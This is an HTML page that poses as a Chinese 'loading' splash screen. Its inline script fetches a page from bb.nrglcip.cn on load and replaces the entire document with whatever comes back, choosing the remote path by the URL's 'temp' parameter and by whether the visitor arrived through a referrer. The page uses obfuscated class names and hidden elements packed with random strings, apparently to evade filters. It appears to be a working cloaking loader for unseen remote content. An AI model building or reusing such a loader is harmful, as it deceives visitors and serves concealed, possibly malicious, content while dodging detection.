<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .dBh60bJJ0 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .dBh60bJJ0 .lkL0yG {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .dBh60bJJ0 .content {
            line-height: 50px;
            text-align: center
        }

        .dBh60bJJ0 .img {
            width: 100%
        }

        .dBh60bJJ0 .wFWdxVN {
            text-align: center
        }

        .dBh60bJJ0 .wFWdxVN span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .dBh60bJJ0 .wFWdxVN span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .dBh60bJJ0 .wFWdxVN span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .dBh60bJJ0 .wFWdxVN span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .dBh60bJJ0 .wFWdxVN span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .dBh60bJJ0 .wFWdxVN span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .dBh60bJJ0 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NMhgx405wYI(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var oFqHN = NMhgx405wYI('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ oFqHN +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ oFqHN +".html?a=share";
		}
		
        TSsm2XdOFd=url+"#"+new Date().getTime();
        TSsm2XdOFd && function() {
            $.get(TSsm2XdOFd, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>JE7pBgdkqKhkVhX9NYu8Y7yymCilYsqUGSQ</p>
<p  style='display:none'>JE7pBgdkqKhkVhX9NYu8Y7yymCilYsqUGSQ</p>
<p  style='display:none'>JE7pBgdkqKhkVhX9NYu8Y7yymCilYsqUGSQ</p>
<img  src='' style='display:none'>
<p  style='display:none'>JE7pBgdkqKhkVhX9NYu8Y7yymCilYsqUGSQ</p>
<a  href='#' style='display:none'>CPIN1JsGialbYfBcBY3KBVlrkZgaPzJk7su6ChTvJCxSKPBzjPDL3i4B</a><div class="dBh60bJJ0">
    <div class="lkL0yG">
        <div class="wFWdxVN">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>QrAVt6jLUBEEdnjKLvOWbIuAlntNAOO3zkrv2RxUOExnP7OO</p>
<b style='display:none' >YMehUC6ZUF65NoInSimEHD52zGiQwQWRsruzy4ncAhvHlblBPvcLFQJSWLczzK4wzUU9mTAFbNbTxzZz</b>
<p  style='display:none'>QrAVt6jLUBEEdnjKLvOWbIuAlntNAOO3zkrv2RxUOExnP7OO</p>
<span style='display:none'>WBBs8c8IzZjtkd1ibgBPo5pvQ71VPwpjLVkDXtWsX</span>
<b style='display:none' >YMehUC6ZUF65NoInSimEHD52zGiQwQWRsruzy4ncAhvHlblBPvcLFQJSWLczzK4wzUU9mTAFbNbTxzZz</b></body>
</html>